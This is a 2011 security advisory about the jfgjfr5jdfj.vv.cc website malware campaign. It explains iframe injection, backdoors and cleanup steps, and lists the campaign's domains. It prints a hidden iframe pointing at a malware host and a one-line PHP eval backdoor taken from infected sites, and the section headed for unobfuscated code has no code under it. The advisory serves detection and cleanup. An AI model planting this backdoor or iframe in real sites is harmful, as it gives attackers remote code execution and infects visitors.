jfgjfr5jdfj.vv.cc Malware

Updated: March 31, 2011

The jfgjfr5jdfj.vv.cc places a malicious iframe into a website's web pages index files that accesses malware located on another website. The website is originally accessed through a vulnerability in software running on the website and a backdoor script is inserted which allows further access to the website. In hosting account with multiple websites all the website can be infected due to one of the website being hacked.

To clean up the website you need revert to a clean backup or remove the iframes or the php code that creates those iframes that has been added to index files. The malware can reinfect the website using one or more backdoor that are placed on the website. Our Basic Backdoor Script Finder has been updated to detect this backdoor. You will also need to make sure the software running on the website have been secured. For WordPress you need to upgrade to the latest version. For osCommerce you need to secure the admin area and or upgrade to osCommerce 2.3.1. For other software it usually involves upgrading to the latest version of the software.

We have been contacting the provider of the domain names and the web hosting providers for the domains being used by this to get those shut off, so that hacked website can not spread the malware.

Recent Iframe Format:

<iframe src="http://p6ox.co.cc/forum.php?tp=988ce21ce6eb1180" width="1" height="1"></iframe>

Recent Obfuscated Code format placed in .php files:

Unobfuscated PHP code (you can obfuscate PHP code using this tool):

Backdoor Script Being Placed on Websites:

if (isset($_REQUEST['asc'])) eval(stripslashes($_REQUEST['asc']));

Recent Domains Used by the Malware: jfgjfr5jdfj.vv.cc, gdsagw3hgsrh.co.cc, jfgdhdfhsdfh.vv.cc, vfsgsh4hxfh.co.cc, ktk4gj.co.cc, gasgshshdh.co.cc, gewherhfdh.co.cc, h345jdfhfchf.co.cc, g2hsjgjgfj.co.cc, hfdhe3hjdf.co.cc, ns34jgdmhfm.co.cc, wrag23hdjsg.co.cc, ds23gfdshgfnf.co.cc, gdsg3whfshf.co.cc, hbsfhwerbxn.co.cc, hfdshwhfh3g.co.cc, gsdgwe3gfnx.co.cc, 3gshsddh.co.cc, hdh4hfdhf.co.cc, gsg3wahfh.co.cc, gsgwsgdsgg.co.cc, ktdi5ejytdjy.co.cc, hdfshtrehsht.co.cc, gdsg34gdsgf.co.cc, gsg3gsgfdsg.co.cc, gagdsgewg.co.cc, ghdsg32hgdf.co.cc, g232sgd.co.cc, fg2fsfsdvg.co.cc, hfdah4hdfhgf.co.cc, dfahwhh4hfh.co.cc, gsagddgsg.co.cc, mghmrm.co.cc, bfda3wgfdhf.co.cc, hfdsh34hdhfg.co.cc, gsdfaghw3hgsfd.co.cc, hfdahwhfdhfgdh.co.cc, hfdsah34hh.co.cc, euy0.co.cc, p6ox.co.cc, 71pp.co.cc, 2d7d.co.cc, uxqt.co.cc, f2hl.co.cc, s4gs.cz.cc, 9rk1.co.cc, gtha.co.cc, icu2.co.cc, fsfbv4gdgdg.cz.cc, v934.co.cc, ghtt5rgff.cz.cc, f9tq.cz.cc, gdfkwiksdk.cz.cc, hdfs4hwdhdf.cz.cc, psyzbq.cz.cc, sdgw3gsdg.vv.cc, 8ieq1w0.cz.cc, gs4gshshfs.vv.cc, gsdha3whfh.vv.cc, bxhbawhgsdfhzwre.vv.cc, geg3gsgdwd.cz.cc, gvonlxto1fj.cz.cc, 023uik6fj8.cz.cc, aixfbap7xo.co.cc, 1og0r6uz0hu.cz.cc, da3gwdgsdg.cz.cc, k74yq3zdgw.co.cc, utjtnw91jy.co.cc, sdfgsdfgsdf.co.cc, jd52b9rz6h.co.cc, 5jeuzfn9la.cz.cc, wgrgwozso9.co.cc, llhquzvvp0.co.cc, gwvmloqs.co.cc, oxvz.co.cc, 7ujj.co.cc, 6p58.co.cc, tapgjiuo.co.cc, y58z.co.cc, fvnv.co.cc, gmmidoet.co.cc, sa1o.co.cc, brliimuc.co.cc, bcmc.co.cc, s5t6.co.cc

Recent Virus Scan Identification: Mal/Iframe-V